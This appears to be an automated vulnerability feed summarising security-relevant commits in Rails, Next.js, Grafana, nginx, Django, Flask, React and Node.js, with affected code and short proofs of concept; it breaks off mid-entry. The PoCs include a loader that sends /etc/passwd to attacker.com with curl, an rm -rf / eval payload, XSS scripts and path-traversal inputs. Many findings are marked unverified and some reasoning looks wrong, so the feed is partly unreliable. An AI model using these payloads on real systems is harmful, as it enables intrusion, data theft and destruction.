Feb 24, 2026, 09:19 AM — rails/rails

Commit: 5086622

Author: Jean Boussier

The custom inspect methods in various Rails classes exposed sensitive internal state including cryptographic keys, secrets, and other confidential data in debug output, logs, and error messages. The patch replaces custom inspect methods with a standardized approach that only shows safe instance variables, preventing accidental leakage of sensitive information.

🔍 View Affected Code & PoC

Affected Code

def inspect # :nodoc:
  "#<#{self.class.name}:#{'%#016x' % (object_id << 1)}>"
end

Proof of Concept

# In a Rails console or debug session:
encryptor = ActiveSupport::MessageEncryptor.new(SecretKey.new)
encryptor.inspect
# Before patch: Would expose the secret key in the output
# After patch: Only shows class name and object ID

# Or in ActionCable connection:
connection = ActionCable::Connection::Base.new(server, env)
connection.inspect
# Before patch: Could expose connection secrets, tokens, or session data
# After patch: Only shows safe, filtered instance variables

⚠️ MEDIUM UNVERIFIED Race Condition

Feb 23, 2026, 04:36 PM — vercel/next.js

Commit: 45a8a82

Author: Tobias Koppers

The code had a concurrency bug where the follower's aggregation number was read without proper locking, allowing the inner-vs-follower classification decision to be made on stale data if the aggregation number changed concurrently. This could lead to incorrect task classification and potential data corruption in the aggregation system.

🔍 View Affected Code & PoC

Affected Code

let follower_aggregation_number = get_aggregation_number(&follower);
let should_be_follower = follower_aggregation_number < upper_aggregation_number;

Proof of Concept

Thread 1 reads follower's aggregation number (e.g., 10) and determines it should be a follower. Thread 2 concurrently updates the same follower's aggregation number to a higher value (e.g., 20). Thread 1 proceeds with the stale classification decision, incorrectly treating a node that should be an inner node as a follower, leading to incorrect aggregation graph structure and potential data corruption.

⚠️ MEDIUM UNVERIFIED Open Redirect

Feb 23, 2026, 10:14 AM — grafana/grafana

Commit: e8a2b4b

Author: xavi

The ValidateRedirectTo function was vulnerable to open redirect attacks through URL fragments. Attackers could bypass path validation by using URL fragments containing dangerous patterns like '../' or '//', which were not sanitized before the redirect. The patch fixes this by validating fragments and returning a sanitized URL string instead of the original user input.

🔍 View Affected Code & PoC

Affected Code

if redirectDenyRe.MatchString(to.Path) {
	return errForbiddenRedirectTo
}
// Fragment validation was missing
return redirectTo // Original unsanitized input returned

Proof of Concept

POST /login with redirect_to cookie set to '/dashboard#//evil.com/steal' - the fragment '#//evil.com/steal' would bypass the path validation regex and could be used in client-side JavaScript to redirect users to the malicious domain

🔥 HIGH UNVERIFIED Buffer Overflow/Out-of-bounds Memory Access

Feb 23, 2026, 12:45 AM — nginx/nginx

Commit: bb8ec29

Author: CodeByMoriarty

The code failed to validate that sync sample values in MP4 stss atoms are 1-based as required by ISO 14496-12. A zero-valued stss entry caused the key_prefix calculation to exceed consumed samples, leading the backward loop in ngx_http_mp4_crop_stts_data() to walk past the beginning of the stts data buffer, causing out-of-bounds memory access.

🔍 View Affected Code & PoC

Affected Code

sample = ngx_mp4_get_32value(entry);
if (sample > start_sample) {
    break;
}
key_prefix = start_sample - sample;

Proof of Concept

Craft a malicious MP4 file with an stss atom containing a zero sync sample value (0x00000000). When nginx processes this file with mp4 module enabled and start_key_frame is on, the zero sample causes key_prefix to equal start_sample + 1, which exceeds the samples processed in the forward stts pass. This triggers the backward loop in ngx_http_mp4_crop_stts_data() to read/write beyond the stts buffer boundaries, potentially leading to memory corruption or information disclosure.

⚠️ MEDIUM UNVERIFIED Path Traversal

Feb 21, 2026, 04:06 AM — vercel/next.js

Commit: 632725b

Author: Sebastian "Sebbie" Silbermann

The script accepts user-provided file paths without validation and directly converts them to file URLs, allowing attackers to access arbitrary files on the system. The patch adds proper path handling using pathToFileURL() which normalizes paths and prevents directory traversal attacks.

🔍 View Affected Code & PoC

Affected Code

if (version !== null && version.startsWith('/')) {
    version = pathToFileURL(version).href
}

Proof of Concept

pnpm run sync-react --version "../../../etc/passwd" would allow reading system files outside the intended React checkout directory before the patch

⚠️ MEDIUM UNVERIFIED Cross-Site Scripting (XSS)

Feb 20, 2026, 02:43 PM — django/django

Commit: 283ea9e

Author: SiHyunLee

The Django admin interface was vulnerable to XSS attacks when displaying model string representations that contained only whitespace or malicious scripts. The vulnerability occurred because whitespace-only strings were not properly sanitized before being rendered in HTML contexts, allowing attackers to inject malicious scripts through model __str__ methods.

🔍 View Affected Code & PoC

Affected Code

obj_repr = format_html('<a href="{}">{}</a>', urlquote(obj_url), obj)
# Direct use of obj without sanitization

Proof of Concept

Create a Django model with a __str__ method that returns '<script>alert("XSS")</script>' or just whitespace followed by script tags. When viewing this object in the Django admin interface, the malicious script would execute in the browser due to improper escaping of the object representation in admin templates and breadcrumbs.

🔥 HIGH UNVERIFIED Authorization Bypass

Feb 20, 2026, 08:25 AM — grafana/grafana

Commit: 430abe7

Author: Georges Chaudy

The old authorization system used deprecated Compile method which performed authorization checks item-by-item during iteration, potentially allowing unauthorized access to resources due to race conditions or incomplete authorization state. The patch replaces this with FilterAuthorized using BatchCheck which performs more robust batch authorization before returning results.

🔍 View Affected Code & PoC

Affected Code

checker, _, err := s.access.Compile(ctx, user, claims.ListRequest{
	Group: key.Group,
	Resource: key.Resource,
	Namespace: key.Namespace,
	Verb: utils.VerbGet,
})

Proof of Concept

1. User with limited permissions makes concurrent List requests for resources they shouldn't access
2. During the item-by-item authorization check in the old code, if authorization state changes between checks or there's a race condition, some unauthorized items could pass through the checker
3. Attacker could potentially access resources in folders/namespaces they don't have permissions for by exploiting timing windows in the deprecated Compile authorization flow

⚠️ MEDIUM UNVERIFIED Stack Overflow DoS

Feb 20, 2026, 04:48 AM — vercel/next.js

Commit: ca0957d

Author: Josh Story

The unhandled rejection filter module was being bundled twice, causing mutual recursion when handling unhandled Promise rejections. Each instance captured the other's handler, creating an infinite loop that would overflow the stack and crash the server on any unhandled rejection.

🔍 View Affected Code & PoC

Affected Code

function filteringUnhandledRejectionHandler(reason, promise) {
  // Handler gets called recursively between two instances
  // No guards to prevent infinite recursion
}

Proof of Concept

// Trigger an unhandled Promise rejection in a Next.js server with the vulnerable setup
Promise.reject(new Error('test rejection'));
// This would cause infinite recursion between the two installed handlers,
// eventually overflowing the call stack and crashing the Node.js process
CONFIRMED

⚠️ MEDIUM CONFIRMED Hash Collision

Feb 19, 2026, 06:22 PM — grafana/grafana

Commit: 6d3440a

Author: beejeebus

The code was truncating SHA256 hashes to only 10 characters when generating secret names, dramatically increasing collision probability from negligible to ~1 in 16^10. This allows attackers to craft field names that collide with existing secret field names, potentially accessing or modifying secrets they shouldn't have access to.

🔍 View Affected Code & PoC

Affected Code

h := sha256.New()
h.Write([]byte(dsUID))
h.Write([]byte("|"))
h.Write([]byte(key))
n := hex.EncodeToString(h.Sum(nil))
return apistore.LEGACY_DATASOURCE_SECURE_VALUE_NAME_PREFIX + n[0:10]

Proof of Concept

1. Target existing secret with field name 'password' for dsUID 'abc123' (generates truncated hash like 'lds-sv-0d27eff323')
2. Craft malicious field name by brute-forcing inputs until finding one that produces same 10-character prefix
3. With ~1.1M attempts, find collision like field name 'malicious_field_xyz' that also produces 'lds-sv-0d27eff323'
4. Create datasource with the colliding field name to access/overwrite the legitimate 'password' secret

⚠️ MEDIUM UNVERIFIED Prototype Pollution

Feb 19, 2026, 04:37 PM — facebook/react

Commit: f247eba

Author: Tim Neutkens

The original code used JSON.parse with a reviver function that could potentially allow __proto__ property manipulation during RSC payload deserialization. The patch explicitly deletes __proto__ keys during the walking phase and moves away from the reviver approach to prevent prototype pollution attacks.

🔍 View Affected Code & PoC

Affected Code

return JSON.parse(json, response._fromJSON);
// where _fromJSON reviver processes all key-value pairs including __proto__

Proof of Concept

Send RSC payload with malicious JSON: {"__proto__": {"polluted": true, "isAdmin": true}} - this could pollute Object.prototype during the reviver processing before parseModelString filters are applied, potentially affecting application logic that checks object properties.

⚠️ MEDIUM UNVERIFIED HTTP Response Splitting / Cache Poisoning

Feb 19, 2026, 03:02 AM — pallets/flask

Commit: c17f379

Author: David Lord

The session was not properly marked as accessed when only reading session metadata (keys, length checks), allowing responses to be cached without the Vary: Cookie header. This could lead to cache poisoning where one user's cached response is served to another user, potentially exposing session-dependent data.

🔍 View Affected Code & PoC

Affected Code

def __getitem__(self, key: str) -> t.Any:
    self.accessed = True
    return super().__getitem__(key)

def get(self, key: str, default: t.Any = None) -> t.Any:
    self.accessed = True

Proof of Concept

1. User A visits `/check` endpoint that does `if 'admin' in session:` (metadata access only)
2. Response cached without Vary: Cookie header since session.accessed stays False
3. User B (different session) visits same endpoint, gets User A's cached response
4. User B sees content based on User A's session state instead of their own session

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 19, 2026, 03:35 AM — pallets/flask

Commit: 089cb86

Author: David Lord

The session was not being marked as accessed when only checking keys/metadata, allowing caching proxies to cache pages for different users. This could lead to session data being served to wrong users through shared caches. The patch fixes this by tracking session access at the request context level.

🔍 View Affected Code & PoC

Affected Code

def __getitem__(self, key: str) -> t.Any:
    self.accessed = True
    return super().__getitem__(key)

Proof of Concept

1. User A logs in and visits /profile (session contains user data)
2. Caching proxy caches the response without Vary: Cookie header
3. User B visits /profile and gets User A's cached profile data
4. This occurs because operations like 'username' in session or len(session) didn't set accessed=True, so no Vary header was added

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 19, 2026, 05:56 AM — pallets/flask

Commit: daca74d

Author: David Lord

The session was not being marked as accessed when only reading operations like checking keys or length occurred, causing the 'Vary: Cookie' header to not be set. This could allow caching proxies to serve the same cached response to different users, potentially leaking session-dependent data between users.

🔍 View Affected Code & PoC

Affected Code

def session(self) -> SessionMixin:
    if self._session is None:
        self._session = si.make_null_session(self.app)
    return self._session

Proof of Concept

User A visits `/profile` which checks `if 'user_id' in session:` and returns personalized data. Caching proxy caches this response without Vary: Cookie header. User B visits same URL and receives User A's cached personal data because session wasn't marked as accessed during the `in` operation.

⚠️ MEDIUM UNVERIFIED Race Condition

Feb 19, 2026, 12:58 PM — grafana/grafana

Commit: b0d812f

Author: Rafael Bortolon Paulovic

The code had a race condition vulnerability during database migrations where concurrent writes to legacy tables could occur during unified storage migrations in rolling upgrade scenarios. This could lead to data corruption or inconsistent state as multiple processes could simultaneously modify the same database tables without proper synchronization.

🔍 View Affected Code & PoC

Affected Code

Resources: []migrations.ResourceInfo{
	{GroupResource: folderGR, LockTable: "folder"},
	{GroupResource: dashboardGR, LockTable: "dashboard"},
}

Proof of Concept

During a rolling upgrade, start a unified storage migration for dashboards while simultaneously having another Grafana instance write to the dashboard table. The race condition occurs when: 1) Migration process reads dashboard data from legacy tables, 2) Another instance modifies the same dashboard record, 3) Migration process writes to unified storage based on stale data, resulting in data loss or corruption of the dashboard modifications made in step 2.

🔥 HIGH UNVERIFIED Authentication Bypass

Feb 19, 2026, 10:06 AM — grafana/grafana

Commit: d2b5d7a

Author: Georges Chaudy

The code had a fallback authentication mechanism that would allow any request to bypass authorization checks when the primary authenticator failed. The fallback would accept requests with only namespace validation, effectively allowing unauthorized access to resources.

🔍 View Affected Code & PoC

Affected Code

newCtx, err = f.fallback(ctx)
if newCtx != nil {
    newCtx = resource.WithFallback(newCtx)
}
f.metrics.requestsTotal.WithLabelValues("true", fmt.Sprintf("%t", err == nil)).Inc()
return newCtx, err

Proof of Concept

Send a gRPC request to the unified storage service with malformed or missing authentication headers that would cause the primary authenticator to fail. The fallback authenticator would then activate, and any subsequent resource access request with a valid namespace (e.g., namespace: "some-valid-namespace") would be granted access regardless of actual user permissions, bypassing RBAC controls entirely.

⚠️ MEDIUM UNVERIFIED Access Control Bypass

Feb 18, 2026, 10:25 PM — grafana/grafana

Commit: 1bf8245

Author: Mihai Turdean

The scope resolver cache was not invalidated when datasources were deleted, causing stale name-to-UID mappings. When a datasource was deleted and a new one created with the same name, the cached entry would resolve to the deleted datasource's UID, leading to incorrect authorization decisions. The patch fixes this by invalidating the cache entry for the datasource name scope during deletion.

🔍 View Affected Code & PoC

Affected Code

// Before patch - no cache invalidation in deletion handlers
hs.Live.HandleDatasourceDelete(c.GetOrgID(), ds.UID)
return response.Success("Data source deleted")

Proof of Concept

1. Create datasource 'test-ds' with UID 'uid-123' (cache stores test-ds -> uid-123)
2. Delete datasource 'test-ds' (cache still has stale test-ds -> uid-123)
3. Create new datasource 'test-ds' with UID 'uid-456'
4. Access control checks for 'test-ds' resolve to deleted UID 'uid-123' instead of current 'uid-456', potentially allowing unauthorized access or denying legitimate access

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 18, 2026, 10:33 PM — grafana/grafana

Commit: ba0f62a

Author: beejeebus

The code exposed encrypted datasource secrets even when they were empty, potentially leaking secret metadata or encrypted empty values to unauthorized users. The patch fixes this by filtering out empty secrets before returning them in API responses.

🔍 View Affected Code & PoC

Affected Code

return q.converter.AsDataSource(ds)

Proof of Concept

GET /api/datasources/{uid} - An attacker with read access could retrieve a datasource configuration and see references to all configured secret fields (even empty ones) in the SecureJsonData map, potentially revealing what secret fields are configured and their encrypted empty values, which could aid in further attacks or reveal system configuration details.

⚠️ MEDIUM UNVERIFIED Denial of Service / Resource Exhaustion

Feb 18, 2026, 04:53 PM — vercel/next.js

Commit: c885d48

Author: Zack Tanner

The code had a missing size check for postponed request bodies in self-hosted setups, allowing attackers to send arbitrarily large payloads that would consume server memory and potentially crash the application. The patch ensures maxPostponedStateSize is consistently enforced across all code paths that buffer postponed bodies.

🔍 View Affected Code & PoC

Affected Code

const body: Array<Buffer> = []
for await (const chunk of req) {
  body.push(chunk)
}
const postponed = Buffer.concat(body).toString('utf8')

Proof of Concept

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
next-resume: 1
Content-Length: 1073741824

[1GB of 'A' characters]

This would cause the server to buffer the entire 1GB payload in memory without any size validation, leading to memory exhaustion and potential DoS.
CONFIRMED

⚠️ MEDIUM CONFIRMED Information Disclosure

Feb 18, 2026, 11:55 AM — grafana/grafana

Commit: a6a74c5

Author: Matheus Macabu

The audit logging configuration was exposing sensitive data source request and response bodies by default. This could lead to credentials, API keys, and sensitive query data being logged in plaintext audit files accessible to system administrators.

🔍 View Affected Code & PoC

Affected Code

log_datasource_query_request_body = true
log_datasource_query_response_body = true

Proof of Concept

1. Configure a data source with API key in headers (e.g., Prometheus with `Authorization: Bearer secret-token`)
2. Execute query: `up{job="mysql"}`
3. Check audit logs - they would contain: `"request_body":{"headers":{"Authorization":"Bearer secret-token"}}` and full response data including potentially sensitive metrics values
CONFIRMED

🔥 HIGH CONFIRMED Authorization Bypass

Feb 17, 2026, 03:51 PM — grafana/grafana

Commit: 0c82488

Author: Gabriel MABILLE

The rolebindings API was accessible to all authenticated users without proper authorization checks. This allowed any user to potentially view, modify, or create role bindings, leading to privilege escalation. The patch restricts access to only access policy identities.

🔍 View Affected Code & PoC

Affected Code

if a.GetResource() == "rolebindings" {
    return resourceAuthorizer.Authorize(ctx, a)
}

Proof of Concept

A regular user could make API calls to the rolebindings endpoint (e.g., GET /api/iam/rolebindings or POST /api/iam/rolebindings) with their normal user credentials to access or modify role bindings they shouldn't have access to, potentially escalating their privileges by binding themselves to administrative roles.

⚠️ MEDIUM UNVERIFIED HTTP Request Smuggling / Content Length Mismatch

Jan 30, 2026, 01:06 PM — nginx/nginx

Commit: ec714d5

Author: Sergey Kandaurov

The vulnerability allows attackers to cause a mismatch between the Content-Length header sent to SCGI backends and the actual request body size in unbuffered mode. This can lead to HTTP request smuggling or desynchronization between nginx and SCGI backends, potentially allowing request smuggling attacks.

🔍 View Affected Code & PoC

Affected Code

body = r->upstream->request_bufs;
while (body) {
    content_length_n += ngx_buf_size(body->buf);
    body = body->next;
}

Proof of Concept

Send a chunked POST request to nginx with SCGI backend in unbuffered mode:
`​`​`​
POST /scgi-endpoint HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 100

5
hello
0

`​`​`​
The recalculated body size (5 bytes) differs from original Content-Length (100 bytes), causing the SCGI backend to expect more data than nginx sends, leading to request desynchronization.
CONFIRMED

🔥 HIGH CONFIRMED Code Injection

Feb 16, 2026, 02:59 PM — nodejs/node

Commit: 4d867af

Author: Shelley Vohr

The code used eval() to parse configuration data, which allows arbitrary Python code execution if an attacker can control the node_builtin_shareable_builtins configuration value. The patch replaces eval() with json.loads() to safely parse JSON data.

🔍 View Affected Code & PoC

Affected Code

eval(config['node_builtin_shareable_builtins'])

Proof of Concept

An attacker could set node_builtin_shareable_builtins to '__import__("os").system("rm -rf /")' which would execute arbitrary shell commands when eval() processes it during the build configuration generation.
CONFIRMED

⚠️ MEDIUM CONFIRMED Authorization Bypass

Feb 16, 2026, 09:59 AM — grafana/grafana

Commit: bcc238c

Author: Misi

The endpoint allowed any authenticated user to access team member information without proper authorization checks. The patch adds a permission check requiring 'GetPermissions' verb on the Team resource before returning member data.

🔍 View Affected Code & PoC

Affected Code

// No authorization check before returning team members
result, err := s.client.Search(ctx, searchRequest)
if err != nil {
    responder.Error(err)
    return
}

Proof of Concept

An authenticated user without team permissions could call GET /api/teams/{team-id}/members to retrieve sensitive member information for any team they shouldn't have access to, potentially exposing user associations and team structure across the organization.

⚠️ MEDIUM UNVERIFIED Resource Deletion Bypass

Feb 16, 2026, 07:36 AM — grafana/grafana

Commit: 3f65188

Author: Daniele Stefano Ferru

The code allowed updating Repository resources to remove all finalizers, which would cause immediate deletion without proper cleanup when the resource is later deleted. This bypasses the intended cleanup workflow and could lead to orphaned resources or incomplete cleanup operations.

🔍 View Affected Code & PoC

Affected Code

if len(r.Finalizers) == 0 && a.GetOperation() == admission.Create {
    r.Finalizers = []string{
        RemoveOrphanResourcesFinalizer,
        CleanFinalizer,
    }
}

Proof of Concept

1. Create a Repository resource (finalizers are added automatically)
2. Update the Repository with an empty finalizers array: `kubectl patch repository myrepo --type='merge' -p='{"metadata":{"finalizers":[]}}'`
3. Delete the Repository: `kubectl delete repository myrepo`
4. The resource is immediately deleted without cleanup, bypassing the controller's cleanup logic and potentially leaving orphaned resources

⚠️ MEDIUM UNVERIFIED Authorization Bypass

Feb 16, 2026, 07:30 AM — grafana/grafana

Commit: 45f14bc

Author: Gonzalo Trigueros Manzanas

The files API endpoints were not enforcing quota limits, allowing authenticated users to bypass resource quotas and create unlimited files/dashboards. This could lead to resource exhaustion and denial of service. The patch adds quota checks before allowing POST/PUT operations on files.

🔍 View Affected Code & PoC

Affected Code

func (c *filesConnector) handleRequest(ctx context.Context, name string, r *http.Request, info rest.ConnectRequest) (http.Handler, error) {
	// Missing quota enforcement for write operations
	obj, err := c.handleMethodRequest(ctx, r, opts, isDir, dualReadWriter)
}

Proof of Concept

POST /apis/provisioning.grafana.app/v0alpha1/namespaces/default/repositories/test-repo/files/dashboard1.json with valid auth token and dashboard JSON payload. Repeat requests beyond the configured quota limit (e.g., if quota is 10 resources, make 15+ POST requests creating new files). Before the patch, all requests would succeed despite exceeding quota, potentially exhausting disk space or overwhelming the system.

⚠️ MEDIUM UNVERIFIED Data Integrity Violation

Feb 13, 2026, 10:54 PM — rails/rails

Commit: 1a4305d

Author: Joshua Huber

The Deduplicable module incorrectly treated virtual (generated) columns and regular columns as identical when they had the same name and type, causing regular columns to be silently excluded from INSERT/UPDATE operations. This resulted in NULL values being stored instead of the intended data, leading to silent data corruption.

🔍 View Affected Code & PoC

Affected Code

def ==(other)
  other.is_a?(Column) &&
    super &&
    auto_increment? == other.auto_increment?
end

Proof of Concept

1. Create a table with a virtual column named 'name'
2. Create another table with a regular column named 'name' of same type
3. Access virtual column first to register it in deduplication cache
4. Attempt INSERT on regular table: MyModel.create!(name: 'test_data')
5. The 'name' field will be NULL in database instead of 'test_data' due to column deduplication treating regular column as virtual

⚠️ MEDIUM UNVERIFIED Data Integrity Violation

Feb 14, 2026, 08:50 AM — rails/rails

Commit: 97cda8c

Author: Jean Boussier

The vulnerability allows silent data corruption where regular columns can be incorrectly deduplicated with virtual columns, causing INSERT and UPDATE statements to exclude legitimate columns and store NULL values instead of the intended data. This occurs when the deduplication registry encounters a virtual column first, then treats a regular column with the same name and type as identical.

🔍 View Affected Code & PoC

Affected Code

def ==(other)
  other.is_a?(Column) &&
    super &&
    auto_increment? == other.auto_increment?
end

Proof of Concept

1. Create a table with a virtual column named 'status'
2. Access the virtual column to register it in deduplication cache
3. Create another table with a regular column named 'status' 
4. Attempt to insert data: User.create!(status: 'active')
5. The status field will be NULL in database instead of 'active' because the regular column was deduplicated to the virtual column and excluded from the INSERT statement
BREAKING

💣 CRITICAL UNVERIFIED Code Injection

Feb 13, 2026, 06:45 PM — vercel/next.js

Commit: 740d55c

Author: Tobias Koppers

The feature allows arbitrary webpack loader execution through import attributes without proper validation or sandboxing. An attacker can specify malicious loader code that gets executed during the build process, potentially leading to remote code execution on the build server.

🔍 View Affected Code & PoC

Affected Code

import value from '../data.js' with { turbopackLoader: 'malicious-loader', turbopackLoaderOptions: '{"cmd":"rm -rf /"}' }

Proof of Concept

Create a malicious loader at node_modules/malicious-loader/index.js:
`​`​`​js
module.exports = function(source) {
  const { exec } = require('child_process');
  exec('curl -X POST -d "$(cat /etc/passwd)" http://attacker.com/exfil');
  return source;
}
`​`​`​
Then use: `import data from './file.txt' with { turbopackLoader: 'malicious-loader' }` to execute arbitrary commands during build time.

🔥 HIGH UNVERIFIED Authorization Bypass

Feb 13, 2026, 06:25 PM — grafana/grafana

Commit: 74d146a

Author: Mihai Turdean

The MT IAM API server was using a no-op storage backend for RoleBindings, which silently dropped all write operations and returned empty results for reads. Additionally, the authorizer denied all access to rolebindings. This created an authorization bypass where RBAC role bindings were completely non-functional, potentially allowing unauthorized access or preventing proper access controls from being enforced.

🔍 View Affected Code & PoC

Affected Code

roleBindingsStorage: noopstorage.ProvideStorageBackend(), // TODO: add a proper storage backend
...
return authorizer.DecisionDeny, "access denied", nil

Proof of Concept

POST /apis/iam.grafana.app/v0alpha1/rolebindings with body: {"apiVersion":"iam.grafana.app/v0alpha1","kind":"RoleBinding","metadata":{"name":"admin-binding"},"subjects":[{"kind":"User","name":"attacker"}],"roleRef":{"kind":"Role","name":"admin"}} - This request would be silently dropped by noopstorage, never creating the intended role binding, while appearing to succeed to the caller.

⚠️ MEDIUM UNVERIFIED Use-After-Free / Socket Corruption

Feb 6, 2026, 04:29 PM — nodejs/node

Commit: 37ff1ea

Author: Martin Slota

A race condition in HTTP keep-alive socket reuse allowed responseKeepAlive() to be called twice, corrupting socket state and causing the agent to hand an already-assigned socket to multiple requests. This could cause requests to hang, timeout, or potentially leak data between requests sharing the same corrupted socket.

🔍 View Affected Code & PoC

Affected Code

if (req.shouldKeepAlive && req._ended)
  responseKeepAlive(req);

Proof of Concept

const http = require('http');
const agent = new http.Agent({ keepAlive: true, maxSockets: 1 });

// Send multiple POST requests with Expect: 100-continue header
// The server responds quickly while client delays req.end() slightly
// This triggers the race where responseOnEnd() and requestOnFinish() 
// both call responseKeepAlive(), corrupting the socket and causing
// subsequent requests to hang or timeout due to stripped listeners

for (let i = 0; i < 10; i++) {
  const req = http.request({
    method: 'POST',
    agent,
    headers: { 'Expect': '100-continue' }
  });
  setTimeout(() => req.end(), 0); // Delay to hit race window
}

💡 LOW UNVERIFIED Race Condition (TOCTOU)

Feb 13, 2026, 04:30 PM — nodejs/node

Commit: b92c9b5

Author: giulioAZ

A Time-of-Check Time-of-Use race condition in worker thread process.cwd() caching allowed workers to cache stale directory values. The counter was incremented before the directory change completed, creating a race window where workers could read the old directory but cache it with the new counter value.

🔍 View Affected Code & PoC

Affected Code

process.chdir = function(path) {
  AtomicsAdd(cwdCounter, 0, 1);
  originalChdir(path);
};

Proof of Concept

const { Worker } = require('worker_threads');
const worker = new Worker(`
  setInterval(() => {
    const cwd = process.cwd();
    console.log('Worker sees:', cwd);
  }, 1);
`, { eval: true });

// Rapidly change directories
setInterval(() => {
  process.chdir('..');
  process.chdir('./some-dir');
}, 10);

// Workers will intermittently report incorrect directory paths due to caching stale values with updated counter
CONFIRMED

🔥 HIGH CONFIRMED Privilege Escalation

Feb 11, 2026, 12:01 PM — grafana/grafana

Commit: e97fa5f

Author: Mariell Hoversholm

The vulnerability allows attackers to bypass time range restrictions on public dashboards when time selection is disabled. By manipulating request time parameters, attackers can access annotations outside the intended dashboard time range, potentially exposing sensitive data from unauthorized time periods.

🔍 View Affected Code & PoC

Affected Code

annoQuery := &annotations.ItemQuery{
	From:         reqDTO.From,
	To:           reqDTO.To,
	OrgID:        dash.OrgID,
	DashboardID:  dash.ID,

Proof of Concept

POST /api/public/dashboards/{uid}/annotations with body: {"from": 0, "to": 9999999999999} - This would bypass dashboard time restrictions and retrieve all annotations across the entire time range, even when time selection is disabled and should be restricted to the dashboard's configured time window.
CONFIRMED

⚠️ MEDIUM CONFIRMED XSS

Feb 11, 2026, 12:01 PM — grafana/grafana

Commit: 8dfa644

Author: Mariell Hoversholm

The code was vulnerable to Cross-Site Scripting (XSS) by directly rendering user-controlled data via dangerouslySetInnerHTML without sanitization. Malicious trace data could inject JavaScript that would execute in users' browsers. The patch fixes this by sanitizing HTML content with DOMPurify before rendering.

🔍 View Affected Code & PoC

Affected Code

const jsonTable = <div className={styles.jsonTable} dangerouslySetInnerHTML={markup} />;

where markup could contain:
__html: `<span style="white-space: pre-wrap;">${row.value}</span>`

Proof of Concept

A malicious trace with a KeyValuePair containing: {"key": "malicious", "value": "</span><script>alert('XSS');</script><span>", "type": "text"} would result in script execution when viewing the trace details in Grafana's TraceView component.
CONFIRMED

⚠️ MEDIUM CONFIRMED Header Injection

Feb 11, 2026, 12:36 AM — grafana/grafana

Commit: f073f64

Author: Jocelyn Collado-Kuri

The code forwards arbitrary HTTP headers from incoming requests to outgoing gRPC calls without proper validation or sanitization. An attacker can inject malicious headers that could be used to bypass security controls, manipulate downstream services, or perform request smuggling attacks.

🔍 View Affected Code & PoC

Affected Code

for key, value := range req.Headers {
    ctx = metadata.AppendToOutgoingContext(ctx, key, url.PathEscape(value))
}

Proof of Concept

Send a streaming request with malicious headers like 'Authorization: Bearer stolen-token' or 'X-Forwarded-For: 127.0.0.1' in the Headers map of backend.RunStreamRequest. These headers would be forwarded to the Tempo backend, potentially allowing privilege escalation or IP spoofing attacks against the downstream service.

⚠️ MEDIUM UNVERIFIED Prototype Pollution

Feb 5, 2026, 07:26 PM — vercel/next.js

Commit: 6aeef8e

Author: nextjs-bot

The code was directly accessing the `$typeof` property on potentially untrusted objects without proper validation, allowing attackers to exploit prototype pollution to inject malicious `$typeof` properties. The patch introduces a `readReactElementTypeof` function that uses `hasOwnProperty.call()` to safely check for the property's existence on the object itself rather than the prototype chain.

🔍 View Affected Code & PoC

Affected Code

if (value.$typeof === REACT_ELEMENT_TYPE) {
  var typeName = getComponentNameFromType(value.type) || "\u2026",
    key = value.key;
  value = value.props;

Proof of Concept

Object.prototype.$typeof = Symbol.for('react.element'); const maliciousObj = { type: 'script', props: { dangerouslySetInnerHTML: { __html: 'alert(1)' } } }; // This would bypass React element validation due to polluted prototype

⚠️ MEDIUM UNVERIFIED Integer Division by Zero / Panic-based DoS

Feb 6, 2026, 08:03 PM — vercel/next.js

Commit: 6dfcffe

Author: Niklas Mischkulnig

The code performed integer division without checking for division by zero, which could cause a panic and crash the application. The patch replaces direct division with checked_div() to handle zero divisors safely.

🔍 View Affected Code & PoC

Affected Code

if max_chunk_count_per_group != 0 {
    chunks_to_merge_size / max_chunk_count_per_group
} else {
    unreachable!();
}

Proof of Concept

Set max_chunk_count_per_group to 0 through configuration or input parameters. When make_production_chunks() is called with this configuration, the division chunks_to_merge_size / max_chunk_count_per_group will cause a panic, crashing the Turbopack bundler and causing a denial of service.

⚠️ MEDIUM UNVERIFIED Integer Overflow / Denial of Service

Feb 9, 2026, 10:38 PM — vercel/next.js

Commit: 9a2113c

Author: Luke Sandberg

The code incorrectly used max() instead of min() to clamp worker counts, causing all systems to be treated as having 64+ cores and potentially overflowing usize on systems with many actual cores. This could lead to memory exhaustion or application crashes.

🔍 View Affected Code & PoC

Affected Code

let num_workers = num_workers.max(64);
(num_workers * num_workers * 16).next_power_of_two()

Proof of Concept

On a system with a large number of cores (e.g., 10000), the calculation becomes: (10000 * 10000 * 16).next_power_of_two() = 1,600,000,000.next_power_of_two() = 2,147,483,648, which exceeds usize limits on 32-bit systems and causes massive memory allocation attempts leading to DoS.
CONFIRMED

⚠️ MEDIUM CONFIRMED Path Traversal

Feb 4, 2026, 03:12 AM — facebook/react

Commit: 3ce1316

Author: Joseph Savona

The code had improper path resolution that allowed attackers to access files outside the intended directory structure. The patch fixes relative path resolution by properly normalizing paths relative to PROJECT_ROOT instead of allowing arbitrary relative paths from the current working directory.

🔍 View Affected Code & PoC

Affected Code

const inputPath = path.isAbsolute(opts.path)
  ? opts.path
  : path.resolve(process.cwd(), opts.path);

Proof of Concept

yarn snap compile ../../../etc/passwd

⚠️ MEDIUM UNVERIFIED Denial of Service (Stack Overflow)

Feb 4, 2026, 06:43 PM — facebook/react

Commit: cf993fb

Author: Hendrik Liebau

The recursive traversal of async node chains in visitAsyncNode causes stack overflow when processing deep async sequences. Database libraries creating long linear chains of async operations can trigger this DoS condition. The patch converts recursive traversal to iterative to prevent stack exhaustion.

🔍 View Affected Code & PoC

Affected Code

function visitAsyncNode(...) {
  if (visited.has(node)) {
    return visited.get(node);
  }
  visited.set(node, null);
  const result = visitAsyncNodeImpl(request, task, node, visited, cutOff);

Proof of Concept

// Create a deep chain of async sequences (10000+ levels)
let current = null;
for (let i = 0; i < 10000; i++) {
  current = { previous: current, end: -1 };
}
// This deep chain will cause stack overflow in visitAsyncNode
// when React Flight processes the async node traversal

⚠️ MEDIUM UNVERIFIED Denial of Service

Feb 8, 2026, 07:14 PM — facebook/react

Commit: 2dd9b7c

Author: Jimmy Lai

The code incorrectly checked for debugChannel existence instead of debugChannelReadable, causing the server to signal debug info availability even with write-only channels. This could cause clients to block indefinitely waiting for debug data that never arrives, resulting in a denial of service condition.

🔍 View Affected Code & PoC

Affected Code

